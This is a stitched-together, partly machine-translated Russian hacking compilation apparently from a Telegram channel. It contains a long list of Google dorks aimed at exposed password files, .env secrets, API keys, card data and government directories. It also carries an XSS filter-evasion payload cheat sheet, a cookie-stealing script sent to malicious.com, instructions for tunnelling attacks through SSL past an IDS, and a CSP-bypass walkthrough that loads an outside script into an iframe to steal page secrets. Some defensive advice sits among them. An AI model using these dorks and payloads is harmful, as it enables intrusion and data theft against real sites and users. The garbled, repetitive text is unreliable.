intitle:"index of" facebook-api
intitle:"index of" google-api-php-client
intitle:"index of" sns-login
intitle:"index of" linkedin-api
intitle:"index of" zoom-api
intitle:"index of" facebook-api
intitle:"Index of" people.1st
site:gov.* intitle:"index of" *Dokuments"
intitle:"Index of" etc/shadow
intitle:"index of" "man.sh"
intitle:"Index of cd"
allintitle:index of "/icewarp"
allintitle:index of "/microweber"
intitle:"Apache Flink Web Dashboard"
intitle:"index of" "files.pl"site:gov.* intitle:"index of" *.css
site:gov.* intitle:"index of" *.csv
intitle:"Index of /" intext:"resource/"
intitle:"index of" "wp-config.php.bak"
site:papaly.com + keyword
inurl:admin filetype:xlsx site:gov.*
intitle:"atvise - next generation"
site:gov.* intitle:"index of" *.apk
inurl: /wp-content/uploads/ inurl:"robots.txt" "Disallow:" filetype:txt
site:pastebin.com intitle:"cpanel"
intitle:index of settings.py
db_password filetype:env
site:postman.com + keyword
inurl:admin filetype:xls site:gov.in
inurl:admin filetype:xlsinurl:admin filetype:txt
intitle"index of" "php"
site:.edu intext:"index of" "payroll"
site:*.github.io intext:cheatsheet+offensive+pentesting
site:*.ng intitle:index of
intitle:"index of" "apache.log" | "apache.logs"
intitle:"index of" site:gov.in
allintext"account number"
intitle:"index of" "wp-inc"
site:*.edu.in intitle:index of
intitle:"index of" "/mysql"
intitle:"index of" "admin.js"
intitle:"index of" "*.vcf"
site:*.id intitle:"index of" "screenshot*.jpg"
site:*.se intitle:"index of"
intitle:"index of" "*.yaml"
intitle:"index of" "/products"
intitle:"index of" "wp-inc"
intitle:"index of "/key/" "key.txt"
site:drive.google.com "*.pdf"
intitle.index of API*.txt
intitle:"index of" "admin*.txt"
intitle:"index of" "*.mp4"
intitle:"index of" site:gov.np
inurl:node_modules/ua-parser-js
intitle:"index of" "sysinfo"
site:.nic.in inurl:.php?id=
intitle:"index of" site:gov.np
site:.nic.in inurl:.php?id=
inurl:forgotpassword.php
intitle.index of API*.txt
intitle:"index of" "/public_html"
site:.in | .com | .net intitle:"index of" ftp
intitle:"index of" site:gov.gr
intitle:"index of" "/public/js"
intitle:"index of" site:gov.ru
inurl:node_modules/ua-parser-js
intitle:"index of" "admin*.txt"
intitle:"index of" "document*.pdf"
intitle:"index of" Servlet"
inurl:pastebin "API_KEY"
intitle:"index of" "test.bat "
intitle:"index of" " login.jsp "
site: com intext " organisation data" filetype:xls
intitle:"index of" " index.php.bak "
intitle:"index of" "hello.bat "
intitle:"index of" " YaBB.pl "
intitle:"index of" "dvwssr.dll "
inurl:pastebin "CVV"
intitle:"index of" "browser.inc "
intitle:"index of" upload.asp "
intitle:"index of" "document*.pdf"
intitle:"index of" " webdriver "
intitle:"index of" " sendmail.inc "
inurl:.php?=*php site:.nic.in
intitle:"index of" "msadcs.dll "

Наш канал - https://t.me/webhack_kakao

Java/Javascript - один из языков программирования, наиболее широко используемых компаниями для разработки управленческих сервисов с хорошей доступностью и масштабируемостью.

В данном отчете будут рассмотрены наиболее важные ошибки безопасности, которые влияют на сервисы и/или программы, созданные с использованием языка программирования Java/Javascript, а также протоколы или инструменты, предоставляемые самим языком для их предотвращения/контроля.

Предоставить информацию об основных векторах атак злоумышленников и необходимые рекомендации и критерии, которые следует учитывать для более безопасной разработки веб-приложений на Java.

Предложение протоколов безопасности для различных этапов разработки веб-приложения, создаваемого на Java.

Проектирование и разработка веб-сервисов с использованием J2EE с использованием библиотек и инструментов, которые можно найти в Java. Проектирование и разработка веб-сервисов с использованием J2EE с использованием библиотек и инструментов, которые можно найти в Java.

Внедрение систем шифрования для хранения данных в нашей базе данных в случае ошибки безопасности. в случае новой ошибки безопасности, чтобы не подвергать ее риску.

Инъекционные атаки SQL или LDAP

Инъекция кода является одним из наиболее известных и широко используемых сообществом векторов атак, таких как SQL-инъекция или LDAP, причем sql является наиболее известным и опасным, поскольку позволяет злоумышленнику получить доступ ко всей нашей базе данных, но как она работает и как ее предотвратить.

SQL-инъекция заключается во вставке SQL-кода в машину жертвы через обычные входные данные, предоставляемые сервером, например, в такие поля, как имя пользователя и пароль, которые хранятся в SQL-базах данных, используемых Java, с целью получения доступа к базе данных для получения или удаления всех хранящихся в ней учетных данных. учетные данные, хранящиеся в базе данных.

Яркий пример SQL-инъекции основан на передаче в качестве входного параметра кода или команды в обход систем проверки сервера для предоставления или запрета доступа.

Изображение показывает один из примеров множества, уязвимых для атаки SQL-инъекции, с использованием команды Атака SQL-инъекции, используя команду <') OR '1'='1'> в качестве имени пользователя и пароля, дала бы нам доступ к серверу, так как пароля даст нам доступ к серверу, так как условие выражения всегда истинно. всегда истинно.

Если параметры имени пользователя и пароля не проверены должным образом, злоумышленник может получить доступ, используя только эту команду. Атакующий мог бы получить доступ, используя только эту команду, но этот тип атаки можно предотвратить, так как мы собираемся этот тип атаки, как мы увидим в следующем разделе.

Как предотвратить это?

Контрмеры для предотвращения этого типа атак очень хорошо определены в связи с частым использованием и важностью защиты базы данных нашей организации.

Использование параметризованных запросов для разделения проверки входных параметров, введенных пользователем, для этого используются предварительно составленные предложения, в которых указывается, какие параметры будут введены, таким образом, можно указать, какой код будет выполнен и какого типа входные переменные, и таким образом предотвратить создание пользователем атаки SQL инъекции, например, введение SQL команды, которая не является ожидаемым типом (строка, целое число, дата) вызовет исключение.

На следующем изображении показано, как сгенерировать безопасный запрос на нашем сервере с помощью Prepared Statement.

Использование хранимых процедур, как правило, не может быть затронуто SQL-инъекцией. Инъекция SQL-кода.

Используйте фреймворки или инструменты, такие как Object Relational Mapping (ORM) в Java. которые предоставляют исходный код для параметризации запросов на вашем сервере.

Блокировать специальные символы, вводимые пользователем, такие как # или " или ', но я не рекомендую этого делать, так как у каждого могут быть свои специальные символы. Я не рекомендую этого делать, поскольку каждый может иметь такой пароль, какой он хочет, используя специальные символы, и есть такие способы, как те. специальные символы, и есть способы, как упомянутые выше, чтобы избежать их даже при использовании специальных символов. специальных символов.

Обеспечьте необходимые привилегии, которые потребуются обычному пользователю при подключении к нашей базе данных, разделите привилегии базы данных, разделить привилегии в коде для выбора различных типов пользователей, использующих одну и ту же базу данных. пользователей, использующих одну и ту же базу данных.

Атаки XSS (Межсайтовый скриптинг)

Этот тип уязвимости возникает, когда веб-приложение получает данные и отправляет их в браузер, не выполнив предварительно соответствующей проверки.

XSS позволяет злоумышленнику написать набор команд в веб-браузере жертвы, что может позволить злоумышленнику удаленно управлять машиной жертвы, пример кода может быть следующим:

<script> alert("Это уязвимо для XSS.") </script>

XSS атака включает использование javascript в качестве кода, но это зависит от типа атаки, так как есть очень сложные, есть достаточно надежный способ узнать, уязвимо ли наше веб-приложение к XSS атаке, тестирование того, что при отправке любого типа информации на сервер, как если бы мы были простыми пользователями, использующими клиент, вы можете увидеть, что было ранее увидеть, что было ранее отправлено на странице ответа.

Существует множество типов XSS-атак, как упоминалось выше, но из них 3 являются наиболее известными и наиболее используемыми. Но мы можем выделить 3 из них, поскольку они наиболее известны и наиболее часто используются, поэтому наш веб-сервер должен быть защищен от этих основных типов атак поэтому наш веб-сервер должен быть защищен от этих основных типов атак:

Отраженный XSS: Представьте, что на сайте есть поле поиска, которое отображает поисковые запросы в результатах, но не проверяет и не экранирует специальные символы должным образом. Злоумышленник может создать вредоносную ссылку, которая включает в поисковый запрос сценарий, например :

http://www.example.com/search?term=<script>alert('XSS-атака')</script>

Если пользователь щелкнет по этой ссылке, скрипт запустится в его браузере, отобразив предупреждение с сообщением "XSS-атака". Злоумышленник мог использовать более вредоносный скрипт для кражи информации или выполнения действий от имени пользователя.

Хранимый XSS: Предположим, что сайт позволяет пользователям оставлять комментарии в блоге, но не проверяет и не экранирует специальные символы в содержимом комментария. Злоумышленник может опубликовать комментарий, содержащий вредоносный скрипт, такой как:

Здравствуйте, отличная статья! <script>document.location='http://www.malicious.com/?cookie=' + document.cookie;</script>

Когда другие пользователи будут читать комментарии, скрипт будет выполняться в их браузерах, отправляя их cookies на вредоносный сайт. Злоумышленник может использовать эти cookies для перехвата сеансов пользователей и получения несанкционированного доступа к их учетным записям.

XSS на основе DOM: Представьте, что веб-приложение использует JavaScript для чтения значения из URL и отображения его на странице без валидации или экранирования. Злоумышленник может манипулировать URL, чтобы включить в него вредоносный скрипт:

http://www.example.com/pag#<script>alert('DOM-based XSS attack')

Когда пользователь переходит по этому URL, скрипт выполняется в его браузере, отображая предупреждение с сообщением "DOM-based XSS attack". Как и в других примерах, злоумышленник мог использовать более вредоносный скрипт для выполнения опасных действий.

Как предотвратить это

Параметры и протоколы, которые необходимо соблюдать, чтобы наш веб-сервис не был уязвим для этого типа атак, основаны на таких методах проверки, как:

- Входная валидация: использование функций валидации и фильтрации для записей, создаваемых на веб-сервере, например, белых списков.

- Обязательная активация httponly в Интернете.

- Шифруйте выходные данные и файлы cookie.

- Фреймворки, такие как Java Server Faces, имеют библиотеки для предотвращения XSS.

- Убедитесь, что все типы данных, предоставляемых пользователем, зашифрованы правильно. правильно.

Подделка запросов (CSRF)

Подделка запросов происходит, когда злоумышленник заставляет браузер жертвы инициировать фальшивый HTTP-запрос, тем самым перехватывая сессионный cookie жертвы для веб-сервера. Таким образом, злоумышленник может генерировать недействительные запросы на машине жертвы, но браузер жертвы считает их легитимными и перехватывает необходимую злоумышленнику информацию. Среди основных причин, делающих возможным этот тип атаки, можно назвать следующие:

- Злоупотребление системой входа, поскольку подавляющее большинство сайтов полагаются на то, что после того, как пользователь аутентифицировался с помощью своих учетных данных, все сгенерированные им запросы являются действительными, и не проверяют, являются ли они запросами с машины, отличной от машины пользователя, что позволяет злоумышленнику выдавать себя за пользователя.

- Использование тегов HTML, использование тегов html означает, что злоумышленник может генерировать в них определенные команды, но с различными функциями в зависимости от намерений злоумышленника.

- Бесконтрольное использование PUT и POST для отправки информации на сервер, бесконтрольное использование этих методов для отправки информации на сервер, например, в форме, может позволить злоумышленнику перехватить эту информацию и отправить ее так, как если бы он был пользователем.

Как предотвратить это

Чтобы предотвратить создание злоумышленником поддельных HTTP-запросов на вашем сервере, рекомендуется выполнить следующие инструкции.
сервера, рекомендуется следовать ряду инструкций:

- Добавьте уникальные и зашифрованные токены.

- Использовать защищенную версию протокола HTTP с шифрованием TLS.

- Добавление в сеанс дополнительной информации помимо обязательной, как показано на рисунке 3.

- Проверяйте информацию, отправленную на веб-сервер, с помощью put и post.

- Используйте заголовки 'Referer', хотя было доказано, что они не являются 100%, но обеспечивают минимально необходимую защиту пользователя, а также предотвращают запросы к недействительным URI.
Инструменты анализа

Инструмент анализа - это не более чем программа, которая отслеживает в нашем коде любой недостаток безопасности, который мы пропустили, основываясь на рекомендациях и атаках, которые определил сам инструмент, упомянутые выше 0 дней не найдут их по причинам, которые уже были упомянуты, остальные упомянутые ошибки и многие другие в теории, если мы предупредим, что он уязвим и возможное исправление.

JASS

Служба аутентификации и авторизации Java (JAAS) была представлена как дополнительный пакет (расширение) к Java 2 SDK, Standard Edition (J2SDK), версия 1.3. JAAS была интегрирована в J2SDK 1.4.

JAAS можно использовать для двух целей.

Для аутентификации пользователей, чтобы надежно и безопасно определить, кто в данный момент выполняет Java-код, независимо от того, выполняется ли код как приложение, апплет, боб или сервлет.

Для авторизации пользователей, чтобы убедиться, что они обладают необходимыми правами контроля доступа (разрешениями) для выполнения выполняемых действий.

JAAS реализует Java-версию стандартного подключаемого модуля аутентификации (Pluggable Authentication).
Module (PAM).

Традиционно Java обеспечивала контроль доступа на основе исходных текстов (контроль доступа на основе того, откуда пришел код и кто его подписал). Однако в ней отсутствовала возможность дополнительно применять контроль доступа на основе того, кто выполняет код. JAAS предоставляет основу, которая дополняет архитектуру безопасности Java такой поддержкой.

Аутентификация в JAAS выполняется в подключаемой манере. Это позволяет приложениям оставаться независимыми от базовых технологий аутентификации.
базовых технологий аутентификации. Новые или обновленные технологии аутентификации могут подключаться к приложению без необходимости модификации самого приложения. Приложения включают процесс аутентификации путем инстанцирования объекта LoginContext, который, в свою очередь, ссылается на Configuration для определения технологии(ий) аутентификации, или LoginModule, который будет использоваться для выполнения аутентификации. Типичные модули входа могут запрашивать и проверять имя пользователя и пароль. Другие могут считывать и проверять образец голоса или отпечаток пальца.

Una vez que se autentica el código de ejecución del usuario o del servicio, el componente de autorización JAAS funciona junto con el modelo de control de acceso central de Java SE para proteger el acceso a los recursos confidenciales. A diferencia de J2SDK 1.3 y versiones anteriores, donde las decisiones de control de acceso se basan únicamente en la ubicación del código y los firmantes del código (CodeSource), en J2SDK 1.4, las decisiones de control de acceso se basan tanto en el CodeSource del código ejecutable como en el usuario o servicio que ejecuta el código. que está representado por un objeto Sujeto. El objeto Asunto es actualizado por LoginModule con los principales y las credenciales apropiados en la autenticación exitosa.

Рекомендации

Эти ссылки содержат общее руководство по технологиям, рассматриваемым в этих разделах, и конкретные рекомендации, которые они содержат.

В этом разделе обсуждаются общие проблемы, с которыми сталкиваются веб-разработчики при создании безопасных веб-приложений, независимо от того, используют ли они

Java, pHp, AJAX или другие веб-языки и/или технологии.

- Аутентификация

Вопросы аутентификации, связанные с безопасными веб-приложениями, такие как базовая аутентификация/аутентификация с помощью дайджеста, аутентификация на основе форм, интегрированная аутентификация (SSO) и т.д.

- Авторизация

Вопросы аутентификации, гарантирующие, что пользователь имеет соответствующие привилегии для просмотра ресурса. Сюда входят такие вопросы, как принцип наименьших привилегий, маркеры авторизации на стороне клиента и т.д.

Принцип наименьших привилегий, маркеры авторизации на стороне клиента и т.д.

- Управление сеансами

Аутентифицированные пользователи имеют надежную и криптографически защищенную связь со своей сессией, приложения применяют проверку авторизации, а приложения избегают или предотвращают распространенные веб-атаки, такие как повторное воспроизведение, подделка запросов и атака "человек посередине".

подделка запросов и "человек посередине".

- Валидация данных

Приложения устойчивы к любым формам входных данных, полученных от пользователя, инфраструктуры, внешних объектов или баз данных.

- Внедрение интерпретаторов

Решение проблем приложений для обеспечения их защищенности от известных атак подмены параметров в распространенных интерпретаторах.

- Обработка ошибок, аудит и протоколирование

Разработка хорошо написанных приложений, которые имеют двойное назначение - журналы и трассировки активности для аудита и мониторинга. Это позволяет легко отследить

транзакцию без чрезмерных усилий или доступа к системе. Они должны обладать способностью легко отслеживать или выявлять возможное мошенничество или аномалии от начала до конца.

- Распределенные вычисления

Синхронизация и удаленные сервисы для веб-приложений, защита приложений от: Синхронизация и удаленные сервисы для веб-приложений, защита приложений от: Синхронизация и удаленные сервисы для веб-приложений, защита приложений от

приложения против:

- условий гонки по времени проверки и по времени использования.

- проблемы распределенной синхронизации

- общие проблемы мультипрограммирования, многопоточности и распределенной безопасности.

- Переполнение буфера

Решает такие проблемы, как:

- Приложения не подвергаются воздействию неисправных компонентов.

- Приложения создают как можно меньше переполнений буфера.

- Разработчикам рекомендуется использовать языки и механизмы, которые относительно невосприимчивы к переполнению буфера.

- Административные интерфейсы

Функции уровня администратора адекватно отделены от деятельности пользователей, которые не могут получить доступ или использовать функции администратора, и обеспечивают необходимый аудит и отслеживаемость административных функций.

- Криптография

Обеспечьте безопасное использование криптографии для защиты конфиденциальности и целостности конфиденциальных пользовательских данных.

- Конфигурация

Создание безопасных веб-приложений, максимально хорошо построенных и максимально защищенных.

- Обеспечение качества программного обеспечения (QA)

Согласно руководству OWASP, "целью обеспечения качества программного обеспечения является подтверждение того, что конфиденциальность и целостность частных данных пользователей защищены в процессе обработки, хранения и передачи данных. Тестирование QA также должно подтвердить, что приложение не может быть взломано, разрушено, захвачено, перегружено или заблокировано атаками типа "отказ в обслуживании" в пределах приемлемого уровня риска". Это подразумевает, что приемлемые уровни риска и сценарии моделирования угроз устанавливаются заранее, чтобы разработчики и инженеры QA знали, чего ожидать и над чем работать.

Ссылки :
Standard Algorithm Name Documentation
Java Cryptography Architecture (JCA) Reference Guide
Documentation

Модераторы и форумчане не стесняются редактировать и перемещать тему, если что-то не так или что-то плохо переведено.Как я уже говорил, я не русский, я сделал это со всей добросовестностью и со всем возможным желанием.

Наш канал - https://t.me/webhack_kakao

Следует отметить, что XSS уязвимости являются браузеро-зависимыми. Все приведенные ниже примеры тестировались в IE6. В других версиях или в других браузерах, примеры могут и не работать.
Например символ обратного апострофа (`) является ограничителем атрибутов только в IE. Другие браузеры, такие как Opera например, не считают этот символ ограничителем.

<li>Разделители атрибутов тега.
Помимо пробела, можно использовать символы:
слеш(<strong>/</strong>), табуляцию, перевод строки. Разделитель можно опустить, если предыдущий атрибут заключен в кавычки.

<image/src="1.png"/alt="Подсказка"/border="0">
<image	src="1.png"	alt="Подсказка"	border="0">
<image
src="1.png"
alt="Подсказка"
border="0">

<image src="1.png"alt="Подсказка"border="0">

<li>Ограничители атрибутов тега
Значения можно заключать в кавычки (двойные и одинарные) и в апострофы, а можно вообще не ограничивать.

<image src="" alt="Моя подсказка" border="0">
<image src="" alt='Моя подсказка' border="0">
<image src="" alt=`Моя подсказка` border="0">
<image src="" alt=Подсказка border="0">

<li>Кодировки символов
Расшифровка символов в скрипте происходит <em>до</em> его выполнения:

<img src=javascript:alert("ok")>
<img src=javascript:alert('ok')>
<img src=&amp#106&amp#97&amp#118&amp#97&amp#115&amp#99&amp
#114&amp#105&amp#112&amp#116&amp#58&amp#97&amp#108&amp
#101&amp#114&amp#116&amp#40&amp#39&amp#111&amp#107&amp
#39&amp#41>

&lt;a href=javascript:alert(%22ok%22)&gt;click me&lt;/a&gt; (только в атрибуте <strong>href</strong>)

<li>Ограничители символьных литералов в скриптах

<img src=javascript:alert('ok')>
<img src=javascript:alert("ok")>
<img src=javascript:a=/ok/;alert(a.source)>

<img src=javascript:alert(String.fromCharCode(111,107))>

<li>Обход фильтрации некоторых символов

<img src=javascript:i=new/**/Image();i.src='http://bla.bla'>(замена пробела на /**/)

<li>Способы запуска скриптов
Несколько способов автоматического запуска скриптов:

<script>alert('ok')</script>

<script src=1.js></script>
<body onLoad=alert('ok')>
<meta http-equiv=Refresh content=0;url=javascript:alert('ok')>
<image src=1.png onload=alert('ok')>
<image src=javascript:alert('ok')>
<image src="" onerror=alert('ok')>
<hr style=background:url(javascript:alert('ok'))>
<span style=top:expression(alert('ok'))></span>

<span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span> (срабатывает только один раз)
<style type="text/css">@import url(javascript:alert('ok'));</style>
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('ok')></object>
<embed src=javascript:alert('ok');this.avi>
<embed src=javascript:alert('ok');this.wav>

<iframe src=javascript:alert('ok')> (только в IE)
<a href=javascript:alert(%22ok%22)>click me</a> (запуск только при клике по ссылке)
<a href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a>  (запуск только при клике по ссылке)

<br SIZE="&{alert('XSS')}"> (только Netscape 4.x)

<li>Различные скриптовые протоколы, способы их написания

<img src=javascript:alert()>
<img src=vbscript:AleRt()>
<img src=JaVasCriPt:alert()>
<img src="   javascript:alert()"> (пробелы до слова javascript) 

<img src=&amp#106&amp#97&amp#118&amp#97&amp#115&amp#99&amp#114&amp#105&amp#112&amp#116:alert()>
<img src=javascript&amp#9:alert()>
<img src=javascript&amp#10:alert()>

<img src=javascript&amp#13:alert()>
<img src="javascript	:alert()">  (перед двоеточием - символ табуляции) 
<img src="java	scri
pt:ale	rt()"> (внутри слова javascript - символ табуляции и возврат каретки)

<li>Вставки скриптов в <strong>style</strong>
Операторы скрипта в атрибуте<strong> style</strong> нужно разделять "<strong>\;</strong>".

<hr style=`background:url(javascript:alert('ok 1')\;alert('ok 2'))`>

<li>Специальные теги.

<image src="1.png" alt="" border="0"> (тег img и image работают одинаково)
<plaintext> (все, что будет идти после этого тега, будет восприниматься как обычный текст - не HTML)
<textarea> (все, что будет идти после этого тега, будет восприниматься как обычный текст - не HTML)

<xml> (все, что будет идти после этого тега, не будет отображаться)

<li>Таблица часто применяемых кодов:

*-в некоторых случаях точку с запятой
можно опустить (если символ стоит в конце строки, или подряд идут несколько символов в данной кодировке).

Наш канал - https://t.me/webhack_kakao

Пример:
Чтобы проиллюстрировать "возможности" IDS по выявлению атак, основанных на использовании протокола SSL, рассмотрим пример такой атаки на узел под управле- нием Windows, на котором установлен также Web-сервер IIS 4.0. В рамках примера рассматривается следующая сетевая конфигурация:
• Сервер IIS прослушивает порты 80 и 443 узла 192.168.7.203.
• Система выявления вторжений Snort запущена на узле webspy, прослушивающем тот же cетевой сегмент, в котором находится и узел 192.168.7.203.
• Взломщик # 1 располагается на узле 10.0.0.1.
• Взломщик #2 располагается на узле 10.0.0.2. Против узла 192.168.7.203 было инициировано четыре атаки: две атаки МDАС RDS с узла 10.0.0.1 и две атаки Unicode cmd.exe с узла 10.0.0.2. Надо сказать, что один из хакеров в отличие от второго не пользовался SSL - протоколом. Если просмотреть все записи журнала сервера IIS узла 192.168.7.203 после хакерских атак, можно увидеть, что все Get- запросы были зарегистрированы. Но при этом в журналах системы Snort, запущенной на системе webspy, содержится только две записи (сохранились только те запросы, которые осуществлялись без использования SSL). В итоге, две атаки через безопасный протокол остались ВНЕ поля зрения IDS!

Туннелирование атак посредством протокола SSL

Для реализации НТТР-атак с использованием протокола SSL можно без проблем воспользоваться броузером. Для этого достаточно указать в адресе URL префикс https, а не http. Далее броузер сам позаботится о согласовании параметров SSL-сеанса и шифровании данных. Однако, если для реализации атаки взломщику нужно воспользоваться сценарием или утилитой, в которых отсутствует встроенная поддержка протокола SSL, придется прибегнуть к SSL- туннелированию. Этот метод подразумевает использование специальной программы, которая прослушивает порт 80 и при поступлении на него стандартных НТТР-запросов передает их через зашифрованное SSL- соединение указанному узлу. В рамках такой схемы передаваемые данные будут автоматически шифроваться и передаваться целевой системе. Построить SSL-туннель на базе пакета ОрепSSL совсем несложно, особенно в системе Unix, в которой используется демон inetd. Рассмотрим пример, когда злоумышленник находится на узле 10.0.0.1, а целевой Web -сервер установлен на узле 192.168.7.203 и прослушивает порт 443. Предположим, что взломщик хочет запустить на целевом Web-сервере такую программу поиска изъянов, как Whisker. Для реализации задуманного плана злоумышленник создает SSL- туннель на другой системе, 10.0.0.2. При этом в файл /etc/inetd.conf на узле 10.0.0.2 он добавляет следующую запись: www stream tcp nowait root /usr/sbin/tcpd /tmp/sslconnect.sh Подобное изменение конфигурации приведёт к тому, что демон inetd будет передавать сценарию /tmp/sslconnect.sh весь TCP-траффик, приходящий на порт 80. В файле /tmp/sslconnect.sh содержится примерно такой код: #!/bin/sh openssl s_client -no_tls1 -quiet -connect 192.168.7.203:443 2> /dev/null Поскольку сценарий /tmp/sslconnect.sh запускается демоном inetd, все данные, подающие на ТСР-порт 80, воспринимаются утилитой openssl как данные, поступающие из стандартного входного потока. IР-адрес 192.168.7.203 целевого сервера жестко задан в самом сценарии. Один такой SSL-туннель одновременно можно использовать для взаимодействия только с одной системой. Параметры -no_tls1 -quiet предназначены для подавления вывода на экран заголовков SSL и обхода предупреждений SSL-аутентификации, генерируемых при использовании неподписанных сертификатов узлов. Все возвращаемые утилитой opensll данные отсылаются обратно через входящее ТСР-соединение демона inetd, поскольку сценарий передает все данные в стандартный выходной поток. Теперь в качестве целевого сервера утилиты Whisker взломщик может задать узел 10.0.0,2 и порт 80, а не узел 192.168.7.203. При этом шифрование и передача данных на узел 192.168.7.203, а также передача ответов по адресу 10.0.0.1 будут обеспечиваться SSL-туннелем. Более удачный и надежный SSL.-туннель можно организовать с использованием утилиты stunnel. Ее исполняемую версию для системы Windows, разработанную на базе библиотек OpenSSL, можно найти по адресу http://www.stunnel.org

Выявление вторжений через SSL

Что делать, если протокол SSL сводит на нет все попытки выявления вторжений? Простого ответа на этот вопрос не существует, хотя рядом специалистов были предложены различные решения, в которых учитывалась специфика конкретных ситуаций. Оказалось, что наилучший вариант связан с использованием реверсивного НТТP посредника (reverse НТТР ргоху). При этом система выявления вторжений размещается между реверсивным НТТР- посредником И Веб-сервером и позволяет выделять в НТТР-трафике сигнатуры атак. Единственный недостаток такой архитектуры заключается в том, что исходный адрес системы, с которой была инициирована атака, заменяется IР-адресом реверсивного НТТР-посредника. Для получения исходного IР-адреса придется сопоставить журналы НТТР-посредника и IDS.

Ты наверное не раз слышал о сканере nmap? Знающие люди говорят много хороших слов в его адрес и это неспроста (хотя хватает и ламья .которое никогда не видело даже nmap в работе, а орёт что он самый лучший) Ведь nmap является универсальным сканером, напичканным всевозможными полезными функциями, обилие которых ты не встретишь ни в одном другом сканере! Nmap поможет определить ОС на сервере, открытые порты, наличие демонов и их название.
Сканер является кроссплатформенным, можно скачать версию как под *nix системы, так и под Windows. Просто в варианте с Windows прийдётся установить библиотеку win-pcap, необходимую для работы сканера. Также советую использовать консольную версию nmap, она намного удобней в работе (да пусть тебя не пугает мрачное окно консоли %)).

Поехали

Сканер nmap имеет богатый синтаксис, большое количество параметров сканирования.
Ниже приведу наиболее нужные и полезные:

Заключение
Я расписал лишь самые необходимые опции, но но когда-нибудь тебе станет мало этих опций, тогда вбивай nmap –help и читай полное описание синтаксиса этого сканера.
Почитать манны про nmap в любом случае стоит.
Можно комбинировать опции сканирования, это очень большой плюс.
Nmap всегда поможет определить демон и его версию на сканируемом хосте, после чего можно сбегать на багтрак и найти эксплойт для нужной тебе версии демона.

Свежую версию nmap всегда можно скачать с http://download.insecure.org/nmap/dist/
Это даже не статейка, а всего лишь краткая справка по синтаксису сканера nmap.

Наш канал - https://t.me/webhack_kakao

Типичный пример использования CSP — это разрешение загрузки ресурсов с собственного домена (self) и разрешение выполнения инлайн-сценариев:

Content-Security-Policy: default-src 'self' 'unsafe-inline';

Такая политика подразумевает «запрещено все, что не разрешено». В данной конфигурации будет запрещено любое использование функций, выполняющих код в виде строки, таких как eval, setTimeout, setInterval, так как отсутствует настройка 'unsafe-eval'.

Запрещено грузить любой контент с внешних источников, в том числе изображения, CSS, WebSocket. И конечно же, JS.

Но не стоит забывать, что self позволяет работать в контексте SOP в рамках этого домена, поэтому мы по-прежнему можем грузить сценарии, создавать фреймы, изображения. Если вспомнить о фреймах, то CSP распространяется и на фреймы, в том числе если в качестве протокола будет указан data, blob или будет сформирован фрейм с помощью атрибута srcdoc.

Можно ли выполнить JS в текстовом файле?

Для начала вспомним один трюк. Если современный браузер открывает изображение или какой-то текстовый файл, он автоматически преобразуется в HTML-страницу.

Это нужно для корректного отображения содержимого пользователю, чтобы у изображения был фон и она была расположена по центру. Но iframe также является окном! Поэтому открытые в нем файлы, которые отображаются в браузере, например favicon.ico или robots.txt, автоматически преобразуются в HTML, независимо от того, корректные ли в нем данные, главное — чтобы был правильный content-type.

Но что, если фрейм будет содержать страницу сайта, но уже без заголовка CSP? Вопрос риторический. Выполнит ли открытый фрейм без политики все JS, которые будут у него внутри? Если иметь XSS на странице, мы можем сами записать свой JS внутрь фрейма.

Для теста сформируем сценарий, который открывает iframe. Для примера возьмем bootstrap.min.css, путь к которому указан на странице выше.

frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);

Теперь посмотрим на содержимое фрейма. Отлично! CSS был преобразован в HTML, и нам удалось переписать содержимое head (хотя оно было пустое). Теперь проверим, сработает ли в нем подключение внешнего JavaScript-файла.

script=document.createElement('script'); 
script.src='//bo0om.ru/csp.js'; 
window.frames[0].document.head.appendChild(script);

Таким образом мы можем выполнить инъекцию через iframe, создать в нем свой JS-сценарий и обратиться в окно-родитель, чтобы украсть оттуда данные.

Для полноценной эксплуатации XSS достаточно открыть фрейм с любым путем, где отсутствует политика безопасности. Это могут быть стандартные favicon.ico, robots.txt, sitemap.xml, CSS/JS-файлы, загруженные пользователями изображения и прочее.

Ошибки сервера для обхода CSP

Но что, если любой корректный ответ (200 — OK) содержит X-Frame-Options: Deny? Вторая ошибка, которую допускают при внедрении CSP, — это отсутствие защитных заголовков при ошибках веб-сервера. Самый простой вариант — обратиться на несуществующую страницу. Я заметил, что многие ресурсы ставят X-Frame-Options только на ответы 200, но 404 игнорируют.

Если и это предусмотрено — попробуем вызвать стандартное сообщение от веб-сервера о некорректной ссылке.

Чтобы гарантированно вызвать 400 bad request на примере nginx, достаточно обратиться на директорию выше с помощью конструкции /%2e%2e%2f. Чтобы препятствовать нормализации ссылки браузером (браузер уберет /../ и отправит /), делаем urlencode точки и последнего слеша:

frame=document.createElement("iframe"); 
frame.src="/%2e%2e%2f"; 
document.body.appendChild(frame);

Другой из вариантов развития событий — передача некорректного urlencode в пути, например /% или /%%z.

Однако самый простой способ получить ошибку веб-сервера — это превышение длины URL. Современные браузеры могут сформировать ссылку много больше, чем поддерживает веб-сервер. А у веб-серверов по умолчанию размер ссылки не должен превышать 8 Кбайт данных, как в nginx, так и в Apache.

Для этого вызываем похожий сценарий, например с длиной пути в 20 000 байт:

frame=document.createElement("iframe"); 
frame.src="/"+"A".repeat(20000); 
document.body.appendChild(frame);

Если вспомнить о других лимитах — это длина кук. Количество и длина кук в браузере может быть больше, чем поддерживают веб-серверы. По аналогии:

1. Создаем огромные cookie:

for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};

Открываем фрейм на любой адрес, сервер вернет ошибку (и часто без XFO и CSP).

Удаляем огромные cookie:
for(var i=0;i<5;i++){document.cookie=i+"="}

Пишем в фрейм свой JS-сценарий, который ворует secret.

Попробуй сам! А если не получится, вот тебе PoC :).

Скорее всего, есть и другие способы вызвать ошибку, например отправить слишком длинный POST-запрос или вызвать ошибку самого веб-приложения (например, с ошибкой 500).

Как этого избежать

Заголовок Content-Security-Policy должен присутствовать на всех страницах, даже на ошибках веб-сервера.

Настройка CSP должна происходить таким образом, чтобы права были минимально необходимыми для корректной работы ресурса, если это возможно. Попробуй включить Content-Security-Policy-Report-Only: default-src 'none' и постепенно включать правила для тех или иных ситуаций.

